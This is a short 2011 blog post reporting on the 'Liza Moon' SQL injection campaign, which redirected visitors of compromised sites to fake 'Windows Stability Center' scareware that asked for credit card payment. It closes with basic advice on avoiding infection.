Thursday, April 7, 2011

Liza Moon Virus and MySQL Injection Attack - Security News

A SQL injection attack named "Liza Moon" after the first known web site to be compromised, has been spreading since December 2010, but appears to be accelerating and has to date affected millions of users.

There are two parts to this virus. First, the injection attack targets web sites running unpatched MySQL server instances, and once compromised, re-directs users to another web site that announces that the user's PC is infected and offers the download of "Windows Stability Center" to address this - a file which actually contains a trojan and is the second phase of the attack. The Windows Stability Center interface is very professional and the way that it presents threats makes it easy to understand how people are being duped into entering their information.

If the user allows the download to be installed, it includes set of "scare ware" applications that conducts a bogus scan of the PC, reports non-existent threats, and prompts the user for a credit card to "upgrade to the full version" to remove the threats.

As of today, over 4 million web sites have been affected, broadcasting this threat to visitors - at one point, even Apple's iTunes was infected. Properly updated anti-virus on the client end, and following the Internet hygiene rule of not downloading anything unless you are sure of the provider can prevent infection, but from a social engineering perspective, the messaging on this one is pretty convincing - hopefully security researchers will be able to "follow the money" and ferret out the perpetrator of this attack. It is interesting for its complexity - it uses a MySQL vulnerability to create a distribution network for itself - and it's payload which seems to be a highly convincing trojan.

WebSense offered this video to explain how the injection attack works:

No comments:

Post a Comment